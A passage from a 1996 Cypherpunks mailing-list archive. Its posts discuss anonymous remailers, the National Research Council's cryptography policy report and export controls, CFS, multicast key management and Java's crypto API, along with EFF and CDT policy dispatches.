>the cypherpunks decide today that coding is not the answer, where will
>free speach on the net be in 5 years? I think it is very naive to beleive
>that the world is going to change enough, quickly enough, that remailers
>will become accepted, and protected, methods of speaking - no matter how
>politically correct we try to be.

Sadly, despite my and others' political work to make this statement
untrue, I must again agree with Ben Holiday.

>Why do we see big business and big government launching a full frontal
>assault on the remailers, while the mailing lists continue to operate
>without incident? Because the enemy's of free speach recognize where the
>true threat to their opression lies. Relying on politics to preserve our 
>rights is like throwing down your gun and asking the bear to please not
>eat you.

Agreed.

>The powers that be want us to shut up. The programs that we write are the 
>weapons that will defend our right to speak. 

Yes, and many like you fill another important function for us, a
function for which many of you take personal risks and spend a lot
of unpaid time (and I thank you).

Without comparing the particular goals, individuals, or any other
aspects of earlier movements to the "Internet Privacy movement"
of today, I see examples from recent history of how we interact
without always knowing it. First, and despite current anti-gun
sentiments among many of the same people, I think that the Civil
Rights movement in the '60s _would_ have suffered more brutality
from law enforcement and the KKK were it not for the armed Black
Panthers, who had a diametrically opposed strategy. Second, the
more recent "environmental" movement has profited by continuously
spinning off more radical factions of itself [ex. "Earth First!"]
to make its positions seem more reasonable and reduce the chances
of compromise. The key to success seems more to be the capability
of more radical action, and yet avoidance of violence or even the
advocacy of violence among the mainstream to maintain either
good PR, principles, or both, while continuing the political-
legal fight. The "threat" of a technical solution "weapon"
forces any political opponents to show their cards before they
play (or just lie) and ideally involves (because it requires)
*no* physical violence whatsoever. Despite opinions to the
contrary, "war is [still] the health of the state." -- I forget
who said that, sorry.
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"Why is it that hundreds of government and university machines can
 operate what amount to anonymous remailers, and no one pays any
 attention, and yet cypherpunks are threatened with jail time for
 what is essentially the same thing?" -- Ben Holiday
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
  <liberty@gate.net>       http://www.shopmiami.com/prs/jimray
___________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMa3D7G1lp8bpvW01AQEzawP/VhP+EU1hk5aniN3IZ7cGkn5joUFA9dhj
yC/D67wj68pfsTQZNOvRsVpEiapfc2OB3INVnjJroLY3i4r7ebiCoowTl+TF6NR+
MtheZ+mkyclpG832cJQLkWI5C61Lk1M5nNRNZ4blR3Gr07Ip5ku0RVovS0Qo8qyi
V9KzwwveO48=
=mydx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 31 May 1996 11:39:30 +0800
To: cypherpunks@toad.com
Subject: Re: Internet traffic is monitored. [NOISE][BOGUS]
Message-ID: <199605302044.NAA24061@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > Extrapolations of fact:
>> >    1.   Internet traffic is monitored.
>> Maybe.  But I doubt that the above story is true.

The story does have a high probability of being bogus,
but it has the slight ring of plausibility that makes it
good conspiracy-urban-legend material.
- The 3DES-encrypted stuff was allegedly posted to the MBONE,
  so many people _could_ have seen it, including Feds,
  without requiring any special Pervasive Monitoring Program.
- Single-DES encryption is commonly available, using tools like nevot and mmcc.
- Triple-DES encryption probably gets different headers, to tell
  the tools how to decrypt them, so you don't need cracking to know.

On the other hand, it'd be highly unlikely that the BATF would be involved.
Maybe Customs, maybe the FBI, possibly even the Secret Service if they
argue that it's computer crime.  But it's not the BATF's turf.

But then, the folks at Area 51 might _claim_ they're BATF.....

#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 31 May 1996 09:20:01 +0800
To: cypherpunks@toad.com
Subject: Your experiences with CFS
Message-ID: <199605301910.OAA31166@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Hello,

Does anyone have any real experience running CFS under Linux (1.2.13)?
I was planning to start using it, but am concerned about its
reliability. Has anyone experienced any glitches with CFS?

How does CFS behave in case of a sudden power loss?

Have you tried to use CFS under pre2.0 versions of linux?

Thanks!

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 31 May 1996 13:21:45 +0800
To: cypherpunks@toad.com
Subject: Group-oriented Key Management (GKMP) protocol
Message-ID: <199605302159.OAA25583@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


There's an interesting proposal for a study at ORNL about
key management for multicast applications.  Unfortunately,
the ietf drafts on the protocol itself have expired :-),
but there are a couple of Postscript papers pointed to by
Tom Dunigan's really extensive reference list
        http://www.epm.ornl.gov/~dunigan/security.html

The ORNL proposal is at http://www.epm.ornl.gov/~sgb/mvpnet.html

ABSTRACT
This proposal focuses on providing security in a multicast-based network
such as the mbone. The proposed solution is application-based and works 
with all IP-multicast based routing protocols. It utilizes the group-oriented 
key management (GKMP) protocol which provides greater scaleability by removing
the need for a separate key distribution center. Secondly, we look at ways 
of securing IP multicast from denial of service attacks.
......
The first step in implementing a secure multicast capability is the ability 
to provide group access control and a scaleable efficient key distribution
meshanism.
We propose implementing the Group-oriented Key Management (GKMP) protocol as the
core of our group access scheme. GKMP currently only exists as a beta version 
at SPARTA. GKMP has become an experimental RFC and the code will be made
publicly
available by SPARTA. 


#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 31 May 1996 13:38:46 +0800
To: John Gilmore <cypherpunks@toad.com
Subject: Re: NRC Cryptography Report: The Text of the Recommendations
Message-ID: <199605302210.PAA26716@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:42 AM 5/30/96 -0700, John Gilmore wrote:
>Recommendation 2:  National cryptography policy should be developed by
>the executive and legislative branches on the basis of open public
>discussion and governed by the rule of law.

Why is it that we even need a "national cryptography policy"?  We don't have 
a "national beer policy," do we?  A "national furniture policy"?  A 
"national pencil policy"?  A "national movie policy"?

The very concept of a "national cryptography policy" implies a level of 
centrally-controlled interest that is unjustified given our constitutution and laws.

>Recommendation 3:  National cryptography policy affecting the
>development and use of commercial cryptography should be more closely
>aligned with market forces.

Does this mean, "Give people what they want," or merely "suck up to 
industry"?  There is a difference...

>Recommendation 4:  Export controls on cryptography should be
>progressively relaxed but not eliminated.
>
>	4.1 -- Products providing confidentiality at a level that
>	meets most general commercial requirements should be easily
>	exportable.  Today, products with encryption capabilities that
>	incorporate 56-bit DES provide this level of confidentiality
>	and should be easily exportable.

What if "commercial requirements" including security the NSA can't break?


>	4.2 -- Products providing stronger confidentiality should be
>	exportable on an expedited basis to a list of approved
>	companies if the proposed product user is willing to provide
>	access to decrypted information upon legally authorized request.

Where's the justification for any restrictions at all?  We all know that 
good encryption is going to get out, anyway.  No criminals are going to use 
escrowed encryption, which removes the justification for a restriction.

And what is a "legally authorized request"?  If a encryption user in another 
country is given a "legally authorized request" from a US court, in what way 
is it binding on HIM?

>	5.3 -- To better understand how escrowed encryption might

>	operate, the U.S. government should explore escrowed
>	encryption for its own uses.  To address the critical
>	international dimensions of escrowed communications, the U.S.
>	government should work with other nations on this topic.

Why are these "critical international dimensions"?  Why "critical"?  I don't 
see it as coming even close to being "critical."

>	5.4 -- Congress should seriously consider legislation that
>	would impose criminal penalties on the use of encrypted
>	communications in interstate commerce with the intent to
>	commit a federal crime.

Gee, I wonder who they're thinking of!

What's wrong with just punishing the underlying crime?  What about some day, 
when encrypted telephones are ubiquitous, and we use them without thought?  
Does that mean we're all guilty of an extra crime or two, just by using that 
crypto phone?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 31 May 1996 15:24:01 +0800
To: cypherpunks@toad.com
Subject: Re: NRC Cryptography Report: The Text of the Recommendations
In-Reply-To: <199605301742.KAA17655@toad.com>
Message-ID: <199605302304.QAA14424@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I read the overview of this, and while it is good that the report calls
for maintaining the legality of domestic encryption and some slight
loosening of the export rules, overall I was diappointed.

First, the report reads as though the intended audience is law
enforcement and security personnel.  The perspective seems to generally
be from the points of view of those bodies.  This is just a subjective
impression I have and it would be interesting to hear whether other
people feel the same.

Second, although they go to some lengths to emphasize the importance of
an open, unclassified process, and that the report itself is completely
unclassified, there are some curios omissions.  For example,
recommendation 4.1 is that 56-bit DES encryption should be exportable.
However, they follow that by saying, "Products covered under
Recommendation 4.1 must be designed in a way that would preclude their
repeated use to increase confidentiality beyond the acceptable level."

This is then followed with a couple of pages of justification for why
this relaxation of the export policies should be allowed.  Much is made
of the fact that people will be more likely to use 56 bit encryption than
the 40 bit which is currently allowed.  (This is an example of the
perspective issue I mentioned above.)  However, nowhere is it stated why
more than 56 bits is not OK, and why it is necessary to forbid repeated
use to increase confidentiality.  There is not one word of discussion of
this proviso.

I suspect the reason is that the NSA can break 56 bit DES but cannot
break higher levels.  But the report doesn't say so.  Presumably this is
because that fact is classfied.  Okay, but it seems hypocritical to make
much of the fact that the discussion is open, and then to limit the
recommendations by considerations which can't be discussed openly.

I also think it is sneaky that they bury this limitation in text which
will not be seen by people who read only the recommendations.

Third, although in broad terms the report is supportive of the use of
cryptography, the specific recommendations do very little to liberalize
current policies.  Free domestic access to cryptography is already the
law.  Raising the export size limit from 40 to 56 bits is a step
forward, but a small one.  Beyond 56 bits they recommend the
requirement of escrowed encryption.  Given current moves to standardize
on triple DES, this is a retrenching action.  They recommend
criminalizing the use of cryptography in committing crimes, admitting
that this may be used in some cases (as comparable mail fraud statues
have been) to bring prosecutions against people who cannot be proven to
have committed any other crime.  "[T]he committee understands that it
is largely the integrity of the judicial and criminal justice process
that will be the ultimate check on preventing its use for such
purposes."

Fourth, recommendation 5.2, to promote the use of link encryption for
cellular phones, is designed to reduce privacy, not help it.
"Recommendation 5.2 is an instance of a general philosophy that link (or
node) security provided by a service provider offers more opportunities
for providing law enforcement with legally authorized access than does
security provided by the end user."  When I wrote my letter to the NRC
during their comment period (available at <URL:
http://www.portal.com/~hfinney/nasinput.html >) I made a similar point,
but with the opposite conclusion, that end to end encryption would be
preferred.

Overall, I am disappointed that the report seems to adopt so much of the
point of view of those forces which will oppose the use of cryptography.
At best it seems to be a recognition that change is inevitable, and that
the most that can be hoped for is to ease the transition to a world where
people have free access to privacy tools.  But in the meantime it appears
designed to delay the transition rather than advance it.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 31 May 1996 10:51:10 +0800
To: cypherpunks@toad.com
Subject: Re: Where does your data want to go today?
In-Reply-To: <v03007002add37b0a637f@[206.126.100.99]>
Message-ID: <Pine.LNX.3.93.960530160550.204B-100000@gak>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3941.1071713581.multipart/signed"

--Boundary..3941.1071713581.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

On Thu, 30 May 1996, Marshall Clow wrote:

> At 12:47 AM -0700 5/30/96, E. ALLEN SMITH wrote:
> >From:	IN%"mclow@owl.csusm.edu"  "Marshall Clow" 29-MAY-1996 19:18:31.60
> >
> >>* Why encrypt before compression? If the encryption is any good, then the
> >>encrypted data won't compress much at all. However, compression before
> >>encryption has its own problems.
> >
> >	What problems does compression before encryption have? It at least
> >seems to work for PGP.
> >
> Most compression schemes put a header/index on the front of the
> compressed data.
> This makes recognizing the correct decryption very simple.
> 
> Call it a limited "known plaintext" situation.

PGP, and I'm sure other encryption programs, strip this header off as there is
no need for it.  Compression actually makes encryption much stronger because
it eliminates a lot of the patterns found in plaintext and makes cryptanalysis
much harder.

-- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me



--Boundary..3941.1071713581.multipart/signed
Content-Type: application/octet-stream; name="pgp00006.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00006.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zCgpp
UUNWQXdVQk1hNEFhYlpjK3N2NXNpdWxBUUhmRlFQK081aFJFbmF1dWFqMFhP
MkpRODZsWlpqQlljWTAwR1kzCmJTeC82QVVYa0lvZ0FpbHBrZ0JBaGRqOE9y
UjJhYktmU1BIV2JCS09iV1ZBOVJWN2Z5SERaNGlkcVVRV1dlNUMKeFNGbEF5
dTRiMFB1UFRTT0laSlBlclo5ZzdWVXRYR3p6MERpeG9ic0d4dWlhamx5eWtx
ZkhOL1FMZTJwZVpWRgpObTE0Nm50M2hjND0KPS90d3cKLS0tLS1FTkQgUEdQ
IE1FU1NBR0UtLS0tLQo=
--Boundary..3941.1071713581.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 31 May 1996 06:33:35 +0800
To: cypherpunks@toad.com
Subject: Re: [crypto] crypto-protocols for trading card games
Message-ID: <199605301440.QAA29702@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain



David F. Ogren wrote:

> Cards are not transferrable.  In order to make cards transferrable the
> game company must be able to invalidate cards which have been traded
> to others.  In other words if Alice wants to give a cards to Bob she
> must:
>
> 1. Contact the game company and tell them she wants to give the card
> to Bob. 2. The game company must issue a new card to Bob with a new
> serial number and with Bob's public key rather than Alice's. 3. The
> game company must invalidate Alice's old card.  Since there is no way
> that the game company can make sure all copies of the card have been
> destroyed it must create a "invalid serial number list" and have the
> players dial into that list everytime the game is played.

This is the double spending problem.

> Since step 3 is so costly to implement, I think it is unlikely that a
> cryptography-based trading card game will have tradable cards.

Given that untraceability of tradable cards is less of an issue than
with e-cash, why not have a central registry of the owners of the cards
(which would consist of the card details paired with the public key
of the owner)?  Admittedly this means the players must be on line,
but then we all know how difficult off line detection of double
spenders is.

For anyone who is _serious_ about starting work on such a game
system, I have a few pieces of Perl and Java code that would really
get you on your way - let me know if you are interested.


Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 31 May 1996 12:48:48 +0800
To: cypherpunks@toad.com
Subject: ELSI: Electronic Licensing and Security Initiative
Message-ID: <v03006f02add3bfb78538@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: oldbear@pop.tiac.net
Mime-Version: 1.0
Date: Thu, 30 May 1996 17:01:10 -0300
To: dcsb@ai.mit.edu (Digital Commerce Society of Boston)
From: The Arctos Group <arctos@arctos.com>
Subject: ELSI: Electronic Licensing and Security Initiative

At 03:43 PM 5/30/96 -0400, Robert Hettinga <rah@shipwright.com> wrote:
>Will,
>
>Will you send me another message with a paragraph about ELSI with the
>URL you gave me, and I'll put it into the e$pam and DCSB lists...
>
>Cheers,
>Bob


Sure.  Here is the beginning of the press release:

   Stream, LitleNet, BBN, and KPMG Announce Industry-Wide Initiative
   to Enable Wide Scale Software Electronic Commerce

   Westwood, MA - May 7, 1996 - Supported by AT&T,IBM , First Data,
   Microsoft Stream International Inc. and LitleNet in association
   with BBN and KPMG, announced today the formation of the Electronic
   Licensing and Security Initiative (ELSI).  The objective of this
   initiative is to develop standards and build and operate a scalable
   clearinghouse infrastructure that will make electronic distribution
   of software secure, accountable, quick, and inexpensive.  The group
   expects the ELSI clearinghouse, which will be designed to accommodate
   various industry approaches, to be operational in test mode by late
   1996...


The "ELSI Clearinghouse Technology Backgrounder" which I pointed you to
earlier is available at:

         http://www.litle.net/ELSI.html


The full text of the press release, with information about the several
particpants is available at:

         http://www.litle.net/cgi-bin/pr.cgi?pr=26

Cheers,
Will
The Old Bear



------------------------------------------------------------------------
The Arctos Group   [Information Strategies for the Real Estate Industry]
   Post Office Box 329 - Chestnut Hill, Massachusetts 02167-0003 USA
  tel: 617.342.7411  -  fax: 617.232.0025  -  email: arctos@arctos.com
         visit our WWW site at URL: http://www.arctos.com/arctos
------------------------------------------------------------------------

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 31 May 1996 17:01:19 +0800
To: cypherpunks@toad.com
Subject: Fight-Censorship Dispatch #11: Landmark Crypto Study Released
Message-ID: <Pine.SUN.3.91.960530172021.4678C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain







-----------------------------------------------------------------------------
                        Fight-Censorship Dispatch #11
-----------------------------------------------------------------------------
                 Landmark NRC crypto policy report released
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

In this dispatch: National Research Council releases crypto policy study
                  Summary of NRC report recommendations
                  Update on online copyright legislation and the CDA

May 30, 1996


WASHINGTON, DC -- The National Research Council released their hefty,
long-awaited report on crypto policy today at a two-hour briefing this
afternoon at the National Press Club in Washington, DC.

The NRC's Computer Science and Telecommunications Board's
congressionally-mandated study, named "Cryptography's Role in Securing
the Information Society," calls for no restrictions on domestic use of
crypto but falls short of recommending that export controls should be
eliminated.

Instead, the report says that controls "should be progressively
relaxed."

The inch-thick study is certain to pack a sizeable wallop in the DC
crypto policy debate, coming on the heels of the Clinton
administration's "Clipper III" white paper and the crypto legislation
pending in Congress.

Kenneth Dam, a law professor at the University of Chicago and the
chair of the NRC committee, summed it up: "We're going to have a
national public debate and Congress has to be involved. We hope this
report contributed to it."

After Dam's overview, Marc Rotenberg from EPIC asked: "There are many
issues left unresolved or open by your report. What happens next with
key escrow?" Rotenberg also asked about the right to speak anonymously
online, which the report didn't address.

Dam hedged, as he did throughout the Q&A session: "We did not set out
to evaluate key escrow. With regard to the right to speak anonymously,
we saw nothing in our report that requires us to take a position.
Accountability is a competing interest. It was not vital to our
report."

The RAND Corporation's Willis Ware clarified: "We by no means advocate
authentication in a universal sense."

Strangely, the executive summary doesn't even mention Pretty Good
Privacy -- the NRC only recommended that 56-bit DES "should be easily
exportable," ignoring PGP completely. The text of Recommendation 4.1
says "products providing confidentiality at a level that meets most
general commercial requirements should be easily exportable."

But does that cover the export of PGP?

The report also says, in Recommendation 5.4, that Congress should
consider legislation that would criminalize the use of crypto to
commit a Federal crime. This portion also attracted flames. Some
audience members wondered if this means crypto would continue to be
treated as a munition, like guns, that can be regulated.

Bottom line: the report is much more favorable than we hoped for,
though it doesn't have everything we want. It *is* surprisingly
pro-crypto considering that all but three of the 16 committee members
had security clearances and were subjected to the NSA's classified
briefing -- widely rumored to be designed to scare the recipient into
agreeing to restrictions on encryption.

As David Sobel from EPIC told me: "These people *did* know what the NSA
knew -- but they still rejected the administration's policy."

CDT's Danny Weitzner wrote: "The study is without a doubt the most
comprehensive and balanced analysis of the complex encryption policy
debate yet published."

Fortunately, the voluminous report comes with an 35-page executive
summary that's available at <http://www2.nas.edu/cstbweb/>. The 
full text of the report will be available online next week.
(Pre-publication hardcopies were distributed at the briefing and
will be available from the National Academy Press for $45. Call
202-334-2605 in two months.)


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                    SUMMARY OF NRC REPORT RECOMMENDATIONS
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

Recommendation 1:  No law should bar the manufacture, sale, or use of
any form of encryption within the United States.

Recommendation 2:  National cryptography policy should be developed by
the executive and legislative branches on the basis of open public
discussion and governed by the rule of law.

Recommendation 3:  National cryptography policy affecting the
development and use of commercial cryptography should be more closely
aligned with market forces.

Recommendation 4:  Export controls on cryptography should be
progressively relaxed but not eliminated.

        4.1 -- Products providing confidentiality at a level that
        meets most general commercial requirements should be easily
        exportable.  Today, products with encryption capabilities that
        incorporate 56-bit DES provide this level of confidentiality
        and should be easily exportable.

        4.2 -- Products providing stronger confidentiality should be
        exportable on an expedited basis to a list of approved
        companies if the proposed product user is willing to provide
        access to decrypted information upon legally authorized request.

        4.3 -- The U.S. government should streamline and increase the
        transparency of the export licensing process for cryptography.

Recommendation 5:  The U.S. government should take steps to assist law
enforcement and national security to adjust to new technical realities
of the information age.

        5.1 -- The U.S. government should actively encourage the use of
        cryptography in nonconfidentiality applications such as user
        authentication and integrity checks.

        5.2 -- The U.S. government should promote the security of the
        telecommunications networks more actively.  At a minimum, the
        U.S. government should promote the link encryption of cellular
        communications and the improvement of security at telephone
        switches.

        5.3 -- To better understand how escrowed encryption might
        operate, the U.S. government should explore escrowed
        encryption for its own uses.  To address the critical
        international dimensions of escrowed communications, the U.S.
        government should work with other nations on this topic.

        5.4 -- Congress should seriously consider legislation that
        would impose criminal penalties on the use of encrypted
        communications in interstate commerce with the intent to
        commit a federal crime.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
            UPDATE ON ONLINE COPYRIGHT LEGISLATION AND THE CDA
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

ON THE CDA:

Folks involved in the case expect a decision within the next week from
the Philadelphia three-judge panel hearing our challenge to the
CDA. The Department of Justice has a few weeks to appeal to the
Supreme Court if they lose.

ON COPYRIGHT:

There's plenty of action on the Hill -- and contrary to what I thought a
week ago, there's even a fighting chance that this braindead copyright
bill will pass this year. 

So far, full Senate judiciary and the House judiciary intellectual
property subcommittee have held hearings. The House has taken the lead
now, and the tentative date for the subcommittee markup of HR2441 is
June 5. (It was to have been last week, but was cancelled at the last
minute when no agreement was reached.)

As Brock Meeks wrote in his Muckraker column on HotWired:

  Both bills contain intellectual property land mines. If they aren't
  defused, all online service providers - from the single-line BBS to
  commercial online services to internet service providers - could end
  up as de facto "copyright cops," made to rig their systems so that
  they can monitor every single bit of information trafficked by their
  users. Reason: both bills hold online service providers liable for any
  infringing information passing through or stored on their system.

  There are other reasons not to like this bill, including language
  that makes surfing the Net a copyright violation unless you happen to
  have a "license" for hitting a particular site with your browser. You
  see, the courts have ruled that simply sucking bits into your
  computer's memory, i.e. surfing, is the same as making a copy of
  something. No, I'm not making this up.

Stay tuned for more reports.


-----------------------------------------------------------------------------

Mentioned in this Fight-Censorship Dispatch:

  NRC report overview text:
    <http://www2.nas.edu/cstbweb/28e2.html>
  Info on online copyright legislation:
    <http://www.ari.net/dfc/>
  Brock Meeks' column on online copyright:
    <http://www.hotwired.com/muckraker/96/20/index3a.html>

This and previous Fight-Censorship Dispatches are available at:
  <http://fight-censorship.dementia.org/top/>

Want to subscribe to the low-traffic, moderated fight-censorship
announcement mailing list for future Fight-Censorship Dispatches and
related messages?

Send "subscribe fight-censorship-announce" in the body of a message
addressed to: 
  majordomo@vorlon.mit.edu

Other relevant web sites:
  <http://www.eff.org/>
  <http://www.cdt.org/>
  <http://www.aclu.org/>
  <http://www.ala.org/>

-----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marty Mestemaker <mestema2@pilot.msu.edu>
Date: Fri, 31 May 1996 13:15:44 +0800
To: "'cypherpunks@toad.com>
Subject: info about subscription
Message-ID: <01BB4E52.7C035AA0@pm101-22.dialip.mich.net>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 31 May 1996 16:35:27 +0800
To: cypherpunks@toad.com
Subject: Java Crypto API questions
Message-ID: <v02120d05add3f5807fe4@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Today, CP's own Marianne Mueller was scheduled to give a talk at JavaOne on
the eagerly awaited (at least by this user) Java Crypto API. I could not
attend the conference, but downloaded the slides for the presentation
<http://java.sun.com/javaone/pres/Crypto.pdf>

Viewing the slides left me with some questions that I hope someone that
attended the talk might be able to answer:

o "Developers do not call into Security Packages directly."
It seems the developer calls java.security (presumably provided by Sun),
which then will call the Security Packages. Is this view correct?

o "Security Packages must be signed. Policy for signing is public and open."
I assume the packages must be signed by Sun. How much will it cost to have
a package signed? How do I obtain a copy of this "public and open" policy?

o "Exportable API. Exportable applications."
One code example shows performing a DES encryption. Another slide mentions
"Support for [...] RSA." This is exportable? What am I missing?

o Where can I get more info on "Jeeves", the Java HTTP Server?

TIA,


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.com (Lee Tien)
Date: Fri, 31 May 1996 16:36:05 +0800
To: cypherpunks@toad.com
Subject: NRC crypto report
Message-ID: <199605310140.SAA03680@mh1.well.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm told the study officially emerges from the National Academy Press as a
book early August.  Until then, apparently, the only available copies will
be a limited number of pre-publication drafts issued at events like the one
scheduled at SRI International, 333 Ravenswood Avenue,  Menlo Park on June
5.

A long way of saying that to get a copy of the whole thing, not a summary,
attend on Wednesday.

Lee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Fri, 31 May 1996 15:15:44 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.22 - NRC Report Calls Admin Crypto Policy Into Question
Message-ID: <v02140b0badd3d67b09c4@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 22
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 22                         May 30, 1996

 CONTENTS: (1) NRC Report Calls Admin. Crypto Policy Into Question
           (2) Join Rep. White Wed 6/5 At HotWired to Discuss the Internet
               Caucus, the CDA, and other Internet Policy Issues
           (3) Subscription Information
           (4) About CDT, contacting us

  ** This document may be redistributed freely with this banner in tact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
-----------------------------------------------------------------------------

(1) NATIONAL RESEARCH COUNCIL REPORT CALLS ADMINISTRATION CRYPTO

A blue ribbon panel of experts today released a comprehensive report on the
state of US encryption policy that calls the Administration's current
cryptography policy into question. The 500 page report, sponsored by the
National Research Council (NRC), highlights the need for strong, reliable
encryption to protect individual privacy, provide security for businesses,
and maintain national security.

Among other things, the report describes how the current US encryption
policy is not working, notes that classified information is not relevant to
the policy debate, and outlines the adverse impact export restrictions have
had on the domestic market.  In addition, the study emphasizes that market
forces and user choices, not law enforcement or national security
interests, should drive the development of encryption technologies and the
debate over US cryptography policy.

The report, entitled "Cryptography's Role in Securing the Information
Society", provides an important starting point for an honest and open
debate on this critical issue. A summary of the report's most important
findings and an overview of its policy recommendations is included below.

OVERVIEW OF SOME OF THE REPORT'S MOST IMPORTANT FINDINGS

For the past 3 years, the US government has attempted to leverage the need
for strong encryption and the desire of US businesses to export strong
privacy and security products as a means impose key-escrow encryption. The
result of this has been a policy morass which has stifled innovation,
limited the availability of strong, easy to use encryption technologies,
and endangered the ability of US companies to compete in the global
information marketplace.

While acknowledging the complexities and challenges associated with the
encryption policy debate, the study's findings directly undermine the
Administration's current approach to cryptography policy. The report
concludes by noting that the "[w]idespread commercial and private use of
cryptography in the United States and abroad is inevitable in the long run
and that its advantages, on balance, outweigh its disadvantages.  The
committee concluded that the overall interests of the government and the
nation would best be served by a policy that fosters a judicious transition
toward the broad use of cryptography."

The NRC study identified several critical issues:

* CURRENT US ENCRYPTION POLICY IS NOT WORKING:  The study is highly
  critical of the current ad-hoc approach to US encryption policy,
  particularly the reliance on export controls. The study states
  explicitly, "Current national cryptography policy is not adequate to
  support the information security requirements of an information
  society."

  The study goes on to note, "Indeed, current policy discourages the use
  of cryptography, whether intentionally or not, and in so doing impedes
  the ability of the nation to use cryptographic tools that would help
  to remediate certain important vulnerabilities.  For example, through
  the use of export controls, national policy has explicitly sought to
  limit the use of encryption abroad but has also had the effect of
  reducing the domestic availability to businesses and other users of
  products with strong encryption capabilities."

* CLASSIFIED INFORMATION IS NOT RELEVANT TO THE POLICY DEBATE: The NRC
  report explicitly states that classified information is "not
  particularly relevant" to the policy debate. The study states, "The
  debate over national cryptography policy can be carried out in a
